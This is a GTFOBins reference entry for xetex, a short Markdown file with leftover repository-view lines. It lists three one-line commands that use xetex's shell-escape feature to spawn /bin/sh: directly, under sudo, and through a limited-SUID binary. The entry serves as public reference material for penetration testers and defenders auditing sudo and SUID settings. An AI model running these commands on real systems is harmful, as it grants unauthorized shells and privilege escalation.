GTFOBins.github.io/_gtfobins/xetex.md

13 lines
260 B
Markdown
Raw Normal View History

---
2021-04-22 22:15:18 +02:00
functions:
shell:
- code: |
xetex --shell-escape '\write18{/bin/sh}\end'
2021-04-22 22:15:18 +02:00
sudo:
- code: |
sudo xetex --shell-escape '\write18{/bin/sh}\end'
limited-suid:
- code: |
./xetex --shell-escape '\write18{/bin/sh}\end'
---